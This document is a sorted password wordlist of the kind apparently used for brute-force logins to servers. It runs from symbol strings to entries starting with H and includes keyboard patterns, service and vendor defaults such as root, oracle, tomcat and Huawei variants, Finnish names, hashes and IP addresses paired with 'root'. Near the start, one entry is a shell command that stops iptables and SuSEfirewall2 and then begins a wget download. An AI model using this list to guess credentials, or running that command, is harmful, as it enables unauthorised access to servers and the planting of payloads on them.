
 
 %NULL%
!
!!!
!!!!!ccdos
!!!111
!!@@##$$%%^^&&**((
!!QQAAZZ
!!qq@@ww
!#$123
!#%&(@$^*)!@#$%)(*&^zxcvbnm85
!#QWEASD
!$*lixiangyu610098
!12d30l1v31r44!
!1@2#3
!1@2#3$4
!1@2#3$4%5
!2#4%6
!2#4%6&
!2#4%6&8
!2#Qwe
!2QwAsZx
!2dw!(ZGJdefoQy3UtS
!51@hw#deb
!@
!@#
!@#!@#
!@#!@#!@#
!@#$
!@#$!@#$
!@#$%
!@#$%12345
!@#$%54321
!@#$%67890
!@#$%QWERT
!@#$%^
!@#$%^&
!@#$%^&*
!@#$%^&*(
!@#$%^&*(   
!@#$%^&*()
!@#$%^&*()_+
!@#$%^&*(987654321qq
!@#$%^123
!@#$%^123.
!@#$%^123..
!@#$%^123...
!@#$%^123456
!@#$%^abcdef
!@#$%^idc
!@#$%qwert
!@#$%sms
!@#$&*()
!@#$1234
!@#$123456
!@#$1qaz
!@#$5678
!@#$QWER
!@#$RFV
!@#$abcd
!@#$asdf
!@#$qwe
!@#$qwer
!@#$qwer1234
!@#$qwerASDF
!@#$qwerASDFzxcv
!@#$qwerasdf
!@#$qwwerasdfzxcv
!@#$rewq
!@#$rewqasdf
!@#$zxcv
!@#$zzidcQWER10.1
!@#$zzidcQWER10.3
!@#0000004
!@#123
!@#123!@#
!@#123,./
!@#123.
!@#123..
!@#123...
!@#1234
!@#123456!@#
!@#123QWEqwe
!@#123abc
!@#123qwe
!@#2013
!@#2468
!@#321
!@#5201314
!@#678
!@#789
!@#ASD
!@#ASDzxc
!@#EWQASDCXZ
!@#QWE
!@#QWEASD
!@#QWEASDZXC
!@#QWEASDZXC234wersdfxcv
!@#QWEasdzxc
!@#QazWsxEdc
!@#_123QWE
!@#aa123
!@#abc
!@#abc123
!@#admin
!@#admin123
!@#ewq
!@#ewqasd
!@#idc!@#
!@#qaz
!@#qaz$%^wsx
!@#qaz123
!@#qazwsx
!@#qq123
!@#qwe
!@#qwe123
!@#qweASD
!@#qweASDzxc
!@#qweasd
!@#qweasdzxc
!@#qwedsazxc
!@#qwerty
!@#root
!@#sa123
!@#sa321
!@$#jMu2vEUIOLweoP#!TTG$@#dsgfGR#$sgs
!@)(@)_#_=
!@*(@HBsd8H!@#&@EDBAS*@B#!(BD
!@QWASZX
!@qwASzx
!@qwas
!Q2w#E4r%T
!Q2w#E4r%T6y
!Q@W#E
!Q@W#E$R
!Q@W#E$R%T
!Q@W3e4r
!QA@WS#ED
!QAZ#EDC
!QAZ1qaz
!QAZ2was
!QAZ2wsx
!QAZ2wsx#EDC
!QAZ2wsx#EDC4rfv
!QAZ2wsx3edc
!QAZ3edc
!QAZ3edc%TGB
!QAZ@WSX
!QAZ@WSX#EDC
!QAZ@wsx
!QAZXSW@
!QAZXSW@#EDC
!QAZxsw2
!QAZxsw2#EDC
!QAZxsw2#EDCvfr4
!QAZxsw23edc
!QWE!asd
!Z@X3c4v
!admin888
!letmein123!
!manage
!nera@6794
!null!
!q2w3e4r
!q@w#e$r
!q@w#e$r%t
!qaz
!qaz1QAZ
!qaz2WSX
!qaz2wsx
!qaz2wsx#edc
!qaz2wsx3edc
!qaz3wsx
!qaz@WSX
!qaz@Wsx
!qaz@wsx
!qaz@wsx#edc
!qazxsw2@
!sp64m3!
!user!
!z@x#c
""
"null"
#010#012#015INCORRECT
#22s3ks@liy
#@!
#@!~`123
#@$@#F@#
#EDC$RFV
#EDC$RFV5tgb
#EDCvfr45tgb
#I$*$(*I)$_)+$%
#Pslasll!P#!@
#alpha/123/omega#
#edc
#hackm3babylogrono1#
#jaime56
#x4%a68k3l5q0d7x1z9d0z
#x4%a6d7x1z9d0z8k3l5q0
$#@!
$A%P?W!5T3Mw,#[y
$R%T^Y7u
$RFVBGT%^YHN
$changeme$
$n^
$rfv
%$#@!
%5%7%4%5%1%4%8%7
%NULL%
%NUii%
%TGB@WSX
%TGB^YHN7ujm
%^&*1234
%^TYGHBNzjcoo1129
%d
%no
%no pass%
%nopass%
%nuii%
%nul%
%null
%null%
%tgb
%username%
%username%12
&UJM*IK<(OL>)P:?
&UJM<KI*(OL>
&^%$#@!
&b4;c2!;k(Ly3-);s(B-
&null&
&thecentercannothold&
&ujm
(#**&$)($*)@#
(((H)))
((Null))
()_+90-=
(*&^%$#@!
(HxuB9dC0_UG!ld!
(ol.
)(*&^%$#@!
)*network$@@^
)p;/
)w%WLq^3UAwn
*
*&^%$#@!
*&^%4321
*****
*^doarmata8210
*^doarmata86
*admin
*ik,
+#SGU9&rbf-#
++++++
,./,./
,./123456
,./<>?
,./?><
,ki89ol.
-
--
---
----
-----
-------
--------------
--------------------
-----------------------------
---------------------------------
----------------------------------------
-00000000
-pl,=[;.
.
..,,!@yy0558236400
..-55
......
...123qwe
..///
.123qwe
.126.249.142
.369
.cn
.com
.net
.org
.php
/.
/.,mnbvcxz
////////
//////////
///////////
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http
/usr/lib/postfix/master
0
0.123456789
00
000
000.000
0000
00000
00000 
000000
000000 
0000000
00000000
000000000
0000000000
0000001234qwer
00001010101010101010101010
000123!@#
0002593w
0007
007007
007bond
00F11240d00naproc3power0r7USERNAMEh0vis1on4q5wLn
01
010101
010203
01113
0122
0123
01233
01234
012344
012345
0123455
0123456
01234566
01234567
012345677
012345678
0123456788
0123456789
0123456789!qaz
01234567899
0147258369
0147852369
0192837465
021hb.com200
0301fjfzw1=-
03718g5
03718ge5
051778m
056789
06tyg23
0724939114
0727
0727527122
0744988265
090909
09211984
098765
0987654321
0HcT5GfWAOcc
0OKM9IJN8UHB
0admin
0c34nair
0fe14df4dd889178
0ff1c3
0guest
0l23456
0m9n8b
0o9i8u7y
0ok9ij
0okm9ijn
0okm9ijn8uhb
0p3nbr@v0
0p3nbrav0
0p3nbravo
0p3r4t0r
0p9o
0p9o8i
0p9o8i7u
0p9o8i7u6y
0p9o8i7u6y5t
0p9o8i7u6y5t4r
0p9o8i7u6y5t4r3e
0p9o8i7u6y5t4r3e2w
0p9o8i7u6y5t4r3e2w1q
0p;/.lo98ik,
0penbravo
0plmnko9
0r4cl3
0r@cl3
0r@cle
0rFoRd1
0racl3
0racle
0test
0trs
0wnzr0x1
1
1!2@3#
1!2@3#4$5%
1+1+2
1,2,3,4,5,
1.2.3
1.23321E+12
1.23456E+11
1.23457E+12
10000
10000!))))
10010!))!)
10011!))!!
100200
100200..
100200300
10086
10086!))*^
10086!@#
10086!@#$%
10086...
100861!
1008611!))*^!!
100861qwert
100dedi@
100dns
100dns.com
101010
10101010
101010192
101010388
101010668
10203
102030
1020304050
1022
1023-8134623fd
1029384756
10D2mixmswCN
10isp
10jqka
10sne1
11
110
110!!)
110110
110119114
110120
110120119
1103
111
1111
1111)
11111
111111
111111 
1111111
11111111
111111111
1111111111
1111111111111
111111\t
111111abc
11112222
1111badger
111213
111222
111222333
111I5Lik3P4rtY@v3r
111QQQ
111aaa
111qqaazz
111qqq
111qqq...
11221122
112233
11223344
1122334455
112233aa
112233aabbcc
112233qq
112358
1123@123a
1123qwe,.
115599
119
119!!(
11\\par
12
12!@34#$
12$$12$$
12.34.56
120
120!@)
121
1212
121212
12121212
1212123
121231234
1212Qwe
1212qwe
1213waverly
123
123!@#
123!@#$
123!@#$%
123!@#$%^
123!@#.com
123!@#123
123!@#345^&*
123!@#QWE
123!@#abc
123!@#abcABC
123!@#asd
123!@#qazwsx
123!@#qwe
123#123
123#@!
123#@!qaz
123$
123$%^
123$%^&
123$%^&*
123$4567
123$qwer
123$root
123&123
123+123
123+456+789
123+456=21
123,.
123,./
123,./a
123,./e
123,./f
123,./i
123,./n
123,./o
123,./p
123,./q
123,./qwea
123,./r
123,./t
123,./u
123,./w
123,./y
123-abc
123-abcd
123..
123..**
123...
123..0
123..zz
123.0
123.0xx
123.0zz
123.123
123.123.00
123.123.123
123.123a
123.321
123.456
123.456.789
123.456a
123.COM
123.a
123.abc
123.asd
123.com
123.com.cn
123.idc
123.qwe
123.qwe!@#
123///
1230
1230!@#$
123000
1231
12311
123123
123123,./
123123.0+
123123.com
12312312
123123123
1231234
12312345
123123abc
123123abc.+
12315
12321
123234
123258.
1233
123312
1233123
123321
1233211234567
123321abc
123333333
1233333333
1234
1234!@#
1234!@#$
1234!@#$%
1234!@#$%^
1234!@#$asdf
1234!@#$qwer
1234!@#qwe
1234$#@!
1234%^
1234%^&*
1234....abcd
1234.abcd
1234.asdf
1234.qwer
1234.zxcv
12341234
12344
12344321
123445!@#$%^
12345
12345 
12345  
12345!@#$%
12345)(*&^
12345-
12345..
12345.com
123454321
123455
123456
123456 
123456  
123456  183.26
123456  200
123456 1
123456!
123456!@#
123456!@#$%^
123456!@#$%^&
123456&*()
123456+
123456+789
123456,.
123456,./
123456.
123456......
123456.0
123456.123456
123456.654321
123456.a
123456.com
123456.q
1234560
1234561
123456111
123456111111
123456123
123456123456
1234566
1234567
1234567!@#$%^&
12345677
12345678
12345678 
12345678!qaz
1234567811
123456788
123456789
123456789!
123456789!@#
123456789+
123456789+++
123456789,./
123456789/*-
1234567890
1234567890!@#$%^&*()
1234567890)(*&^%$#@!
1234567890.
12345678910
1234567899
123456789987654321
123456789a
123456789a123
123456789qq
12345678a
12345678abc
12345678qwe
12345679
1234567a
1234567qwe
123456879
123456@123
123456@a
123456@abc
123456QWERTY
123456^%$#@!
123456a
123456a!
123456a?
123456aA
123456aa
123456abc
123456abc!@#
123456abcdef
123456as
123456asd
123456asdfgh
123456q
123456qaz
123456qq
123456qwe
123456qwer
123456qwert
123456qwerty
123456qwerty!@#$%^
123456root
123456wsx
123456x
123456zxcvbn
123457
12345@#$manhar
12345@ABC
12345^
12345^&*()
12345a
12345abc
12345abcde!@#$%
12345admin
12345asdfg
12345qwert
12345qwert!@#$%
12345r
12345root
12345style
12345tgb
12345x
1234@%^&*
1234@ABC
1234@abcd
1234ABCD
1234ASDFasdf
1234QWER
1234QWERasdf
1234a
1234aaaa
1234abc
1234abcd
1234abcd!@#$
1234admin
1234asd
1234asdf
1234asdf!@#$
1234asdfASDF
1234asdfg
1234qqqq
1234qwe
1234qwea
1234qwer
1234qwer!
1234qwer!@#
1234qwer!@#$
1234qwerASDF
1234qwerQWER
1234qwerasdf
1234qwerty
1234rewq
1234root
1234shanghai
1234zxcv
1234zzzz
123567
123569qqq
123654
123654,./
123654...
123654.com
123654789
123654qwe
123654qwert
123654re
123654tak
12369874
123698745
123789
123987
123@!@#
123@123
123@123a
123@321
123@456
123@7x24
123@QWE
123@_test
123@abc
123@abcd
123@admin
123@qwe
123@root
123@zxc
123ABC...
123Asd
123Das...
123QWE123
123QWE456tyu
123QWEASDZXC
123QWEasd
123QWEasdZXC
123QWErty
123_!@#qwe
123_abc
123_abcd
123_nb,./
123_qwerty
123_server
123a.123
123a456
123abc
123abc!@#
123abc!@#()
123abc!@#,./
123abc!@#ABC
123abc,.
123abc,./
123abc.+
123abc...
123abc123ABC
123abc123abc
123abcd
123abiko
123adachi
123adidas
123adm
123admi
123admin
123aion
123aion123
123alex
123alex123
123apache
123apache123
123asd
123asd!@#
123asd456
123asd456zxc
123asdfghjkl
123asterisk
123asterisk123
123b08e7
123deploy
123deploy123
123deployer
123deployer123
123ewq
123ewqasd
123ewqasdcxz
123ftp
123ftp123
123ftpuser
123git
123git123
123go
123jboss
123jboss123
123jenkins
123jenkins123
123joomla
123joomla123
123kkk
123linux
123manager
123mincraft
123minecraft123
123mysql
123nagios
123nagios123
123openbravo
123openbravo123
123oracle
123oracle123
123otrs
123otrs123
123postgres
123postgres123
123q123
123qasdzxc
123qaz
123qaz!@#
123qazQAZ
123qazwsx
123qazwsxedc
123qwe
123qwe 
123qwe!
123qwe!@
123qwe!@#
123qwe!@#QWE
123qwe,.
123qwe,./
123qwe.com
123qwe1    
123qwe123
123qwe456asd
123qwe456rty
123qweASD
123qweasd
123qweasdzxc
123qweasdzxc   
123qweqwe
123qwer
123qwer!
123qwerasdfg
123qwert
123qwerty
123qwertyuiop
123qwezxc
123redmine
123redmine123
123root
123root123
123root321
123server
123support
123test
123tomcat
123vc5823.clid
123www
123z123
123zxc
123zxc!@#
123zxc123
123zxcasd
123zxcvbn
123zxcvbnm
124
124sdg
12580...
12593
12593!@%(#
12593...
126.com
127
128314
129319eiaddamwmeiie12312
12975Eq19429
12QWASZX
12QWasZX
12QWaszx
12qw3e
12qwas
12qwaszx
12qwaszxcvbnm
12qwsazx
12wqasxz
12wsxzaq
1313
131312312
1314520
1314520..
1314520../
1314521
1314521zaizai
1314woaini
13572468
13579
1357913579
135792468
1357924680
13579qetuo
13681403
137263
13800138000!#*))!#()))
142536
14500
147+258=369
147.741
147258
147258.
147258369
147369.
147741
147852369
147852963
1502
15121512
159159
159357
159753
159951
16
163.com
168168
174.34.163.46
177@dg1
17911!&(!!
17951!&(%!
17sept1986
180.162.254.227 root ""
188.126.231.85
19770909
19791011
1982
1983
1984
1985mai2
1985this1is2not3my4real5password61985
1989
1991
1992
1993
1994
1995
1@3$5^&8(0
1Fluturasu123
1Q2W3E
1Q2W3E4R
1Q2W3E4R5T
1Q2W3E4R5T6Y
1Q2w3E4r
1QA2WS3ED
1QAZ2WSX
1QAZ2WSX3EDC
1QAZ2wsx
1QAZ@WSX
1QAZXCVBNM
1QAZxsw2
1Qaz2Wsx
1Qaz2Wsx3Edc
1Qaz@ws
1a2a3a
1a2a3a4a
1a2b
1a2b3c
1a2b3c4d
1a2b3c4d5e
1a2s3d
1a2s3d,./
1a2s3d4
1a2s3d4f
1a2s3d4f5
1a2s3d4f5g
1a2s3d4f5g6
1a2s3d4f5g6h
1a2s3d4f5g6h7
1a2s3d4f5g6h7j
1a2s3d4f5g6h7j8
1a2s3d4f5g6h7j8k
1a2s3d4f5g6h7j8k9
1a2s3d4f5g6h7j8k9l
1a4
1admin
1c2x3z
1c50e7d8
1dd
1f0km7js
1guest
1i2o3p
1mC0re13
1nf0
1nfo
1nt&ll1tch&
1q
1q1a1z2w2s2x3e3d3c
1q1q1q
1q1q1q 
1q1w3e
1q2a3z
1q2a3z$
1q2a3z,./
1q2w
1q2w#E$R
1q2w3
1q2w3e
1q2w3e!@#
1q2w3e!Q@W#E
1q2w3e$
1q2w3e$R%TY
1q2w3e$R%T^Y
1q2w3e*
1q2w3e,./
1q2w3e,./? 
1q2w3e.e3w2q1
1q2w3e123
1q2w3e1q2w3e
1q2w3e4
1q2w3e4R
1q2w3e4r
1q2w3e4r!@#$
1q2w3e4r5
1q2w3e4r5t
1q2w3e4r5t!@#$%
1q2w3e4r5t6
1q2w3e4r5t6y
1q2w3e4r5t6y7u
1q2w3e4r5t6y7u8i
1q2w3e4r5t6y7u8i9o
1q2w3e4r5t6y7u8i9o0p
1q2w3easd
1q2w3r
1q3e5t
1q@w#e$r
1qa
1qa2ws
1qa2ws3ed
1qa2ws3ed4rf
1qa2ws3ed4rf5tg6yh7uj8ik
1qaz
1qaz!@#
1qaz!QAZ
1qaz#EDC
1qaz#EDC%tgb
1qaz#EDC5tgb
1qaz#EDC5tgb 
1qaz)P:?
1qaz0okm
1qaz1QAZ
1qaz1qaz
1qaz23eds
1qaz2WSX
1qaz2w
1qaz2ws
1qaz2wsX
1qaz2wsx
1qaz2wsx!@#
1qaz2wsx!QAZ@WSX
1qaz2wsx#
1qaz2wsx#EDC
1qaz2wsx#EDC$RFV
1qaz2wsx3
1qaz2wsx3e
1qaz2wsx3edc
1qaz2wsx3edc4rfv
1qaz2wsx3edc4rfv5tgb
1qaz2wsx3edc4rfv5tgb6yhn
1qaz2wsx3edc4rfv5tgb6yhn7ujm
1qaz2wxs3edc
1qaz2xsw
1qaz2xsw3edc
1qaz3edc
1qaz3edc5tgb
1qaz@1qaz
1qaz@2wsx
1qaz@3edc
1qaz@WSX
1qaz@WSX 
1qaz@WSX#EDC
1qaz@WSX#edc
1qaz@WSX123
1qaz@WSX3edc
1qaz@WSX3edc$RFV
1qaz@wsx
1qaz@wsx#edc
1qaz@wsx3edc$rf
1qaz@wsx3edc$rfv
1qazXSW
1qazXSW@
1qazXSW@ 
1qazZAQ!
1qazse4
1qazse4rfv
1qazwsx
1qazwsx2
1qazxcvbnm,./
1qazxdr
1qazxdr5
1qazxsw2
1qazxsw2!QAZXSW@
1qazxsw23
1qazxsw23edc
1qazxsw2edc
1qazzaq1
1qw23e
1qw23er4
1qw23er45t
1qwe23
1qwe2asd
1qwe2zxc
1qwer2asdf3zxcv
1root
1shapps
1shora
1stchina.com
1t2y3u
1t2y3u5i
1test
1vixeafa5
1z2x
1z2x3c
1z2x3c,./
1z2x3c4v
1z2x3c4v5b
1z2x3c4v5b6n
1z2x3c4v5b6n7m
1z2x3c4v5b6n7m,./
1zvxif
1zxc2qwe
2
2#%#@%$
2#%$asdfjhfa$!#@%$
2000
2001
2002
2003
20032003
2003windows
2004
2005
2006
20081128
2009
2010
2011
2011#dbimplanta
2012
201234
201234.com
2013.com
2013idc.com
2014LaunchParty!
2014linux
2015admin
2015happy
2015jgyy@604
2015root
2015server
2015style
202
202.133.60.206 22 root 
21
2112
212121
21241036
2164823977newpass123
21idc.com
21viacloud
21vianet
21vianet!@#
21vianet.com
21wqsaxz
22
222
2222
22222
222222
2222222
22222222
222222222
2222222222
222830222960
223344
225588
22b
2321124
2322e3343
232323
2323232323
232wsx
2342w3e4r
23456
2345@#$%
2345wert
234fd
23948575
23wesdxc
24021988
245.4765432!
24Banc81
24bd33f1bedd1f88fd788b3517c8813d
252525
2580499
258369
25umet#2^10
266344
28ced69e8eb76da240271dba206ce53f
29skskKcV2
2@177cz
2a
2admin
2borNOT2b
2ca597c5e7e234b08fc6616a01a437de
2d3e8g7y9y
2guest
2test
2w2w3e3e
2w3e4r
2wsx!QAZ
2wsx#EDC
2wsx#EDC$RFV
2wsx#EDC4rfv
2wsx$RFV
2wsx1qaz
2wsx1qaz!
2wsx3edc
2wsx3edc4rfv5tgb
2wsxcde34rfvbgt5
2wsxcde3admin
2wsxdr5
2wsxzaq1
3
3.1415926
30624700
31337
31338
31994
321
321!@#
321.321
321.abc
321321
321321321
321323244
321654987
321abc
321ewq
321ewqdsa
321ewqdsacxz
321qwedsazxc
3232@wewe
325xi
33
332211
333
3333
33333
333333
33333333
333333333
3333333333
333666
33445566
336699
33893389
340b09bb71bf67a066a6fbb02aa50633
3456#$%^
3456.hk
346sf
34@qwew
34jdsfkl
35inter.com
35inter518admin
35interhuizhou
35intershantou
35rert
362729
365obsserver!
369258.
369258147
369333
369369
369666
369789
3748FSHFKJSDBFHVSDFHSFA
3874SDGFWYJGUIDKSJXVC4
3@P];B^,FU;tNM5c
3H8IDC!!#
3HIDC!@#
3W0k_3Nd0r
3admin
3bb
3bhwX6F+
3e
3e2w1q
3e4r5t
3edc#EDC
3edc$RFV5tgb
3edc$RFV5tgb^YHN
3edc2wsx1qaz
3edc4rfv
3edc4rfv5tgb
3edc4rfv5tgb6yhn
3edcVFR$
3edcft6
3ep5w2u
3guest
3h8com10
3nt3r4j4.
3rddf
3sBwzbY5GojOux
3test
3ware
3zgqgy6h
40z1llll
4121284911e84cc8
4132145523d
41b2c3
41b2c3d4
42:be:18:14:e5:75:24:bc:ed:70:f3:fa:9f:de:6a:7e.
4321
4321!@#
4321!@#$
4321ABCD
4321abcd
4321dcba
4321qwer
4389437
43e75233
43r34434e34
444
4444
44444
444444
4444444
44444444
444444444
4444444444
456
456$%^
456+123=21
456+789
456+789=29
456.0
456123
456123pl,
456321
456456
4567$%^&
456789
456lf
456rty$%^
45eter56
47%&aku#2
475869
475869475869
478569
47JngGTYy5hcq
4815162342
4@xor5
4D71F60DA0E8
4admin
4bc123
4bcd1234
4bcd3fgh
4c4d3mi4
4c4d3mic
4ct
4d3mp13r3
4dm1n
4dm1n1str4t0r
4e3w2q1
4f3d2s1a
4fj^w!
4getMen0t
4gtf7c
4guest
4ion
4l3n
4mvw6i
4na2xf
4ng3l
4ngel
4nn4
4nna
4p4ch3
4r3e2w1q
4r5t6y
4r5t6y7u
4rfv
4rfv$RFV
4rfv%TGB^YHN
4rfv5tgb
4rfvBGT%
4rfvBGT%6yhn
4tas
4test
4v3c2x1z
504
50cent
510326mazda
512;Kernel@Comiumb
5138987
516888
5201314
5201314,./
5201314a
5202015
520520
520520520
520@1314
520china
5211314
53cr3t
54321
543210
5432154321
54321bvcxz
54321gfdsa
54321root
54321trewq
545454
5454klkjl
54trgf
5555
55555
555555
5555555
55555555
555555555
5555555555
555888
555idc
55667788
566789x
5678
5678%^&*
56789
567rty
57281c957c2089f4279c3f3d7a3e28d3
5777364
58.199+!@#flying+#@!
584584
585197wd
59603 . .$#@!
5TGB6YHN
5VsxVjPmv2rF
5faWed2ff8aA116e3X1faZ0I0f719Qf40obe
5faWed2ff8aE116e3X1aefaZ000f719Qf40obe
5h3I5Lik3P4rtY@v3r
5idfd9m566
5r6d3v1s5e
5t4r3e2w1q
5t6y7u
5tgb%TGB
5tgb6yhn
5tgb6yhn#P
5tgb6yhn7ujm
5tgb6yhn7ujm8ik,
5tgbBGT%
5tgb^YHN&UJM
5tgbnm,./
5tr43ew21q
5xllbyr7
63375312012a
65330f5a6e9a14bfdaab930c4a402a42
654123
654321
654321abc
654321qweasd
6546456900
659695
66123456
6625329a!123
6625329cdl
666
6666
66666
666666
666666!@#$%^
6666666
666666666
6666666666
666s1czfarginn
66abcd
6701
6789^&*(
687261
696969
69ixaya
6a7bce679721816805089daeccac7a10
6e136e9da8372bc94899ecef857c5405
6e136e9da8372bc94899ecef857c540567
6exestEPuS
6iC47mO@
6iC47mO@password
6tQ#5jF!
6tQ#5jF!password
6y7u8i
6y7u8i9o0p
6yhn&UJM8ik,(OL>
6yhn7ujm
7
706e642a056c7e894ed5a01e55700004
70707
727527122
733112
735260
741
74108520
741852
741852.
741852963
75.0.11.37
753159
7654321
77123456
7734416.+-
7758258
7758520,./
7758520..
7758521
7777
77777
777777
7777777
77777777
777777777
7777777777
777888999
7788
778888888
778899
7795502a
784894
789)_+
789+456=29
7890&*()
789369
789456
789456.
789456123
789789
7897984
789qwe&*(
79
790812
791=HGidc
794613
7RJ0us8e
7a57a5a743894a0e
7fa7c560c3b23067d9ba52a81a65c7d8
7h4a5n9d0a2oiang@))*
7hur@y@t3am$#@!
7hur@y@t3am$#@!(*
7hur@y@t3am$#@!(*(
7u8i9o0p
7ujm*IK<(OL>
7ujm8ik,
7x24.cn
7yhn
800056173
8291euiwdoj
8299539
831126
83Y72HFKWQ12IO394YFR
83db36mjs73$%^#
8429
843m6s6l
850722
85165271
8520
86.123.127.91
861800
8675309
8701900
870226linjin.
87102100lxm//
87654321
87sd5f8as7tfas7d6tfsadgfajsd
8812345
88123456
888!@#
888!@#$
888168
888492
888777
888777666
8888
88888
888888
888888!@#$%^
8888881
8888888
88888888
888888888
8888888888
888888abcd
88889999
888999
889900
8899174
890poi890poi
8ik,*IK<
8ik,.lo9
8ik,9ol.
8ik,9ol.0p;
8ik,9ol.0p;/
8owmpiyd
8owmpiyddyo
8pt46a
8wy257505
90-=()_+
9001a
90210
926
93537393
963852
963852.
963852741
963963369
97a85?4b89e@00bf&520b98$24a7df#
987
987258
987456
987456321
987654
987654321
9876543210
9876543211
987789
98xw.com
990sf.net
9935net
995430aaa
999
99922300
999888777
9999
99999
999999
9999999
99999999
999999999
9999999999
9VHrMDiAMUQBpYJz3vop
9ijn8uhb
9ijn8uhb7ygv
9n8b7v
9ol.(OL>
9x9school
:$R%T^Y7u 
;yogfnvoxu
<<< %s(un='%s') = %u
<b,bujY
================
==================
===========================
============================================
@!
@!#$%&*Th3@#$!F0RcE%&*@#IS!@#$%!&
@#!TG(EWG$#@GHESG#@G@#G@#
@#$%&
@#$%^&*!()
@#$%n3n3aInf3ct@#$%
@#&*(
@#@IO#*&#&GH7
@#QWAS68
@#Rq92u8fjewRweqf45y43tgh3
@#admin123
@$$w0rd
@$$w0rd1
@$$w0rd123
@$$word
@$$word1
@))%!@#
@10n
@123qwe@
@1on
@1q2w3e@
@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@
@@^^%$@#%^&&*(**&^^
@NO@ROOT@NO@ROOT@NO@ROOT@NO@ROOT
@WSX!QAZ
@WSX#EDC
@WSX1qaz
@WSXCDE#$RFV
@WSXcde3
@^@^@^@^@^
@admin
@admin123
@bcAbc
@crinis
@das#afasd43fsd!@a1SD2F1223
@dm1n
@dmin
@dmin!
@dmin123
@dmin123456
@ion
@l3x
@lex
@ng3l
@nn@
@nna
@p@ch3
@p@che
@pach3
@pache
@q1w2e3r4@
@rtz0ne0829
@ster1sk
@sterisk
@wsx
@wsx!qaz
@wsx3edc
A123456+
A123456A
A123654789
A123a123
A1314520
A147B258C369
A147b258c369
A1b2c3
A9fc91AYul
AAA
AAA123
AAABBBCCC
AAAbbbCCC
AB@ab
AB@abcd
ABC!@#
ABC!@#QAZ
ABC-123
ABC123
ABC123.
ABC123.+
ABC123..
ABC123123
ABC123546
ABC@123
ABC@123456
ABC@abc
ABCD123
ABCD@1234
ABCabc123
ABc@12345
ACIOIWXM%@%%!%
ADMIN
ADMIN!@#
ADMIN@123
ADMINISTRATOR
AK1AAAAAAAAAAAAAAAAHWIf8molZpTFtq0A3vF7y3utkwM=
AKG450@ikki.me
ANS#150
ASD.123
ASDF1234
ASDF1234!@#$
ASDQWE!@#
ASP12456
AZUReVoVUS67
Aa111111
Aa123456
Aa12345619
Aa123456789
Aadolf
Aaliyah
Aamu
Aapeli
Aapo
Aappo
Aarne
Aarni
Aarno
Aaro
Aaron
Aarre
Aarto
Aatami
Aatos
Aatto
Aatu
Ab123456
Aba
Abc!@#Def
Abc!@#Qaz
Abc#@!
Abc-123
Abc.123
Abc123
Abc123.123
Abc12345
Abc123456789
Abc123Def
Abc1314520
Abc@123
Abc@123456
Abcd
Abcd123
Abcd1234
Abcd12341
Abcd@123456
Abel
Academics
Access
Access1067TOSAdvisor
AdAstra2012
AdMiN123
AdMin123
Adm123
Admin
Admin!@#
Admin1
Admin123
Admin123!
Admin1234
Admin123456
Admin2
Admin2010
Admin2012
Admin2015
Admin234
Admin888
Admin@123
Admin@1234
AdminTribunal06
Administrator
Adolf
Afs123456
Ahti
Ahto
Ahvo
Aiden
Aija
Aila
Aili
Aimo
Aina
Aini
Ainikki
Aino
Aira
Airi
AitbISP4eCiG
Akfrjy12
Aki
Akseli
Aku
Albert
Ale
Aleksanteri
Aleksi
Aleksis
Ali
Aliisa
Alina
AllIwantforChristmasismytwofrontteeth
Allan
Alli
Alma
Alpi
Alpo
Altti
Alvi
Amalia
Amanda
Anelma
Angelo
Anita
Anitta
Anja
Anna
Anne
Anneli
Anni
Annika
Annikki
Annukka
Ano
Ansa
Anselmi
Anssi
Antero
Anton
Antti
Antto
Anttoni
Anu
Apple123
Arhippa
Arho
Ari
Arja
Armas
Armi
Arsi
Arto
Arttu
Artturi
Arvi
Arvo
Asante
Ascend
Asd!@#
Asd123...
Asd321...
AsdQweZxc
Asdf
Asdf1234
Asdf1234   
Asdf12341
Asdf13579
Asdf13579#
Asko
Aslak
Asmo
Asta
Atro
Atso
Atte
August
Aukusti
Auli
Aulikki
Aulis
Aune
Auni
Auno
Aura
Auri
Auvo
Ava
B449WU22u7avaswEFrAwaphEc
B7E7PErQYjnDNfuj3Ux2phGg9
BAOMI
BP5FbGRr
BUNdAS@#$RT%GQ~EQW#%^QW
B_$Aj3y3#UCraveVE5e23er@P4
BageRoot123Hack
Bailey
Baomi
Baraka01
Boss
BqIP5GQHmqUD
B|*Nsq|TO$~b
C20070929
CAROLIAN
CCC
CFkVOAszgZoc
CGC!#%qwer246,.!!
CHINA123
CLu6iApHl1kl5J5U7Iap
CNAS
COGNOS
CONV
CS|g@l@b
CVBZXCVBL$%||pZ9LkXCVBZXCVBL$
CactiEZ
CactiEZ@Ne0c0m1SP
Cactiez
Calvin1229
Canada123
Cedm7feb
CentOS
Centos
Ch4ng3m3
Ch4ng3m3!
ChangeMe
Changeme123
Changeme_123
ChgDmx09
China
Christian
Cisco
Ciuciuka321
Cmx_123+
Cmx_123,./
Cmx_1230.
Cmx_123456+
Cmx_520520,./
Colocrossing123
Compleri
D-Link
D1314520
DHGJDJDGHKDGHK8967gkdgkJGSFGJSFG
DISC
DLL9@skNO8&285F
DUP
Debian
Deploy
Dev
DidImentionIfuckinghatehackers
DixitCallHK8B7
Dorin12345Dorin
Dup
E5efEHW65
ECHO
Ebs!@#456
Emma
Esbnet@))*
Eshore!@#
Ethan
Ethernet
F4,sh7admin
F5996651FA46C4AE
F8Ek8HERbADE9DtADECmeVaCU
FLADVERT
FSDwef8529637531598273k1d123kid871kid872tralalalovedolce
FlIECHp0R3
Florin1977
Football
Founder123
Fum4tulP0@t3Uc1d3R4uD3T0t!@#$%^%^&*?
G$fg34gf4GHY%T
G00dS5hs3rV3rR00t
GOG
GOODCDN.COM
GYAqMW2G
GanimedeS1
Geardog
GftRudW!!
Ghitr
GlobalAdmin
GoDaddy123
Goethe6750
Good.123
Good123!@#
Google.com
Gw@12345
H0m3l4b1t
H2zJ2aHU
H4ld3f1G0
H;ubh]D"`3,M/FC+
HBSG&$sg82%*G(@3
HELLO
HF#ChinaIDC@IDCcenter
HJKJHJGKHJK
HP
HPDESK
HPJHCNC1!2@3#
HPOFFICE
HPOFFICE DATA
HPONLY
HPP187
HPP187 SYS
HPP189
HPWORD PUB
HTTP
HUAWEI
Hacker
HaiCuMata
HaiCuMata123
HaiTzucute
Hello123
Heremon@./
Hg1bCY37
HoriZani
HuaWei123
HuaWei@123
Huawei
Huawei12#$
Huawei123
Huawei@123
Huawei_123
